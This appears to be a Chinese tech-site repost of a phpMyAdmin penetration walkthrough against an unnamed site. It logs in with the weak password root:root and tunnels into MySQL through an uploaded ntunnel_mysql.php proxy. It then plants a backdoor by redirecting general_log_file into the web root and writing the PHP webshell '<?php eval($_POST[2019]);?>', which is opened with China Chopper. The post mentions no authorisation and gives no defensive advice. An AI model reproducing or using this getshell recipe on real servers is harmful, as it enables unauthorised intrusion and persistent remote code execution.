广告
返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >Phpmyadmin渗透测试的示例
  • 640
分享到

Phpmyadmin渗透测试的示例

2024-04-02 19:04:59 640人浏览 八月长安
摘要

这篇文章给大家分享的是有关PHPmyadmin渗透测试的示例的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。首先通过目录扫描对某站进行扫描,发现存在phpmyadmin,尝试弱口令

这篇文章给大家分享的是有关PHPmyadmin渗透测试的示例的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。

首先通过目录扫描对某站进行扫描,发现存在phpmyadmin,尝试弱口令root:root很幸运进去了

Phpmyadmin渗透测试的示例

尝试使用Navicate进行数据库连接返回禁止远程连接数据库:

Phpmyadmin渗透测试的示例

但是远程命令执行发现本地3306端口时开放的,于是尝试通过代理进行连接:

Phpmyadmin渗透测试的示例

Navicat安装目录下上传ntunnel_mysql.php文件(数据库的代理脚本)到目标服务器任意web站点目录(后面getshell后上传的)

Phpmyadmin渗透测试的示例

上传到D:/phpStudy/WWW目录进行访问http://XXX/ntunnel_mysql.php 测试成功

Phpmyadmin渗透测试的示例

进行测试连接:

(此时,在本地打开Navicat配置Http连接,这里的通道地址就写你上面访问的那个url,说白点儿就是个代理端,勾上使用base64编码,防止waf从中作祟,然后主机名写localhost,账号密码写lnmp01本地数据库用户的账号即可,因为要连接lnmp01本地的Mysql

Phpmyadmin渗透测试的示例

利用日志文件

mysql 5.0版本以上会创建日志文件,修改日志的全局变量,也可以getshell。但是也要对生成的日志有可读可写的权限。

set global general_log = "ON";   #当开启general时,所执行的sql语句都会出现在WIN-30DFNC8L78A.log文件那么,如果修改general_log_file的值,那么所执行的sql语句就会对应生成进而getshell
SET global general_log_file='D:/phpStudy/WWW/test1234.php';  #对应就会生成test1234.php文件
select '<?php eval($_POST[2019]);?>';          #将一句话木马写入test1234.php文件

菜刀连接:

Phpmyadmin渗透测试的示例

感谢各位的阅读!关于“Phpmyadmin渗透测试的示例”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,让大家可以学到更多知识,如果觉得文章不错,可以把它分享出去让更多的人看到吧!

--结束END--

本文标题: Phpmyadmin渗透测试的示例

本文链接: https://www.lsjlt.com/news/55277.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
  • Phpmyadmin渗透测试的示例
    这篇文章给大家分享的是有关Phpmyadmin渗透测试的示例的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。首先通过目录扫描对某站进行扫描,发现存在phpmyadmin,尝试弱口令...
    99+
    2022-10-18
  • python渗透测试linux密码激活的示例
    上篇文章给大家介绍过 python脚本破解linux口令(crypt模块)    感兴趣的朋友点击查看。 linux密码破解 这段代码通过分别读取两个文件,一个为加密口令文件(cr...
    99+
    2022-06-04
    python渗透测试 linux密码破解
  • 【渗透测试学习】—记录一次自测试渗透实战
    写在前面 本文是作者入门web安全后的第一次完整的授权渗透测试实战,因为最近在总结自己学习与挖掘到的漏,无意中翻到了这篇渗透测试报告,想当初我的这篇渗透测试报告是被评为优秀渗透测试报告的,故在此重新整了一下,分享一下自己的思路与骚操作给大家...
    99+
    2023-09-02
    php python 学习 运维 网络
  • 熊海cms渗透测试
    首先,先进行代码审计,丢进seay源代码审计系统自动审计,然后接着一个个手动分析代码 1.文件包含 /index.php 和admin/index.php代码如下 分析代码,接收传进来的参数r,进行addslashes过滤( 在每个双...
    99+
    2023-09-06
    php 开发语言 网络安全 web安全 安全
  • 510cms网站渗透测试
    信息收集 510cms企业网站系统源码,以PHP+MYSQL+smarty开发的企业网站,后台地址为admin/login.php。     使用wappalyzer检测出网站使用的中间件为Apache/2.4.7、使用的PHP版本为p...
    99+
    2023-09-07
    php 数据库 apache
  • 【python渗透测试】python在渗透测试中的利用(完全版,持续中出)
    跟着gpt学习python在渗透测试中的利用 🔥系列专栏:python渗透测试 🎉欢迎关注🔎点赞👍收藏⭐️留言📝 &#...
    99+
    2023-10-12
    python 开发语言
  • 渗透测试入门实战
    本书中文简体字版由 Wiley Publishing, Inc. 授权清华大学出版社出版。未经出版者书面许可,不得以任何方式复制或抄袭本书内容。本书封面贴有 Wiley 公司防伪标签,无标签者不得销售。版权所有,侵权必究。侵权举报电话: 0...
    99+
    2023-06-04
  • Android渗透测试取证实战
    Android渗透测试取证实战是指在进行Android渗透测试过程中,通过收集证据来证明攻击行为的存在和进行相应的追踪。下面是一个A...
    99+
    2023-09-23
    Android
  • Bugku CTF PAR渗透测试3write-up
    目录 Bugku CTF PAR靶场渗透测试3write-up0x01 flag10x02 flag20x03 flag30x04 flag40 ...
    99+
    2023-09-23
    php
  • 渗透测试之目录扫描
    什么是目录扫描: 在我们部署了网站之后有很多的敏感文件,比如说配置文件(.cfg)、数据文件(.sql)、目录文件(/backup /conf /admin)。但是有些网站如果配置出现问题,就会被攻击者攻击。 这些配置的问题会导致数据库用户...
    99+
    2023-09-22
    php 数据库 mysql
  • 怎么进行Web渗透测试
    今天小编给大家分享一下怎么进行Web渗透测试的相关知识点,内容详细,逻辑清晰,相信大部分人都还太了解这方面的知识,所以分享这篇文章给大家参考一下,希望大家阅读完这篇文章后有所收获,下面我们一起来了解一下吧。渗透测试,是渗透测试工程师完全模拟...
    99+
    2023-06-05
  • Android渗透测试的方法是什么
    Android渗透测试方法包括以下几个步骤:1. 信息收集:对目标应用进行分析和了解,包括应用版本、权限、配置文件等信息,以及对目标...
    99+
    2023-08-25
    Android
  • 网络安全渗透测试小程序抓包流程的示例分析
    小编给大家分享一下网络安全渗透测试小程序抓包流程的示例分析,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!小程序测试流程分为两个方面,解包可以挖掘信息泄露问题、隐藏...
    99+
    2023-06-29
  • 网站渗透测试安全检测方案
    许多客户在网站,以及APP上线的同时,都会提前的对网站进行全面的渗透测试以及安全检测,提前检测出存在的网站漏洞,以免后期网站发展过程中出现重大的经济损失,前段时间有客户找到我们SINE安全公司做渗透测试服务,在此我们将把对客户的整个渗透测试...
    99+
    2023-06-03
  • springboot渗透测试流程是什么
    Spring Boot渗透测试流程包括以下步骤:1. 信息收集:收集有关目标应用程序的信息,包括应用程序架构、技术堆栈、网络拓扑等。...
    99+
    2023-09-14
    springboot
  • 利用drozer进行Android渗透测试
      一、安装与启动   1. 安装   第一步:从http://mwr.to/drozer下载Drozer (Windows Installer)   第二步:在An...
    99+
    2022-06-06
    drozer 测试 Android
  • 渗透测试工具sqlmap怎么用
    这篇文章主要介绍渗透测试工具sqlmap怎么用,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!一、检测注入点是否可用C:\Python27\sqlmap>python ...
    99+
    2022-10-19
  • bugku渗透测试 1 writeup(无需VPS)
    靶场地址:BugKu渗透测试1 该靶场只需要20金币就可以开启两小时,算的上非常良心实惠了,趁着有空赶紧刷一刷题目 目录 第一场景: 第二场景: 第三场景: 第四场景: 第五场景: 第六场景: 第七场景: 第八场景:  第九场景: 第十场...
    99+
    2023-09-01
    php 开发语言
  • 自动渗透测试工具集APT2
    自动渗透测试工具集APT2...
    99+
    2023-06-04
  • Web应用渗透测试框架Arachni
    Web应用渗透测试框架Arachni...
    99+
    2023-06-04
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作